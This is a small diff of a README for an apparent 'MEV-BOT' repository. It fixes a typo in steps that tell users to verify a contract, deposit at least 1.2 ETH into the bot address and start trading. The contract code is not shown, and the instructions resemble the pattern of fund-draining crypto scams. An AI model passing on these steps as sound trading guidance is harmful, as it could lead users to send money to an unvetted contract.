mrben1/MEV-BOT/README.md

    - 🟢 Click "Verify"

-5) Deposit funds (at least 1.2 ETH to prevent negating slippage) into your specific contract/bot address.
+5) Deposit funds (at least 1.2 ETH to prevent negative slippage) into your specific contract/bot address.

 6) Go to your verified contract.
 Write contract.
 Enter the amount of ETH you want to trade with into the 1.
 Start.
 Confirm the transaction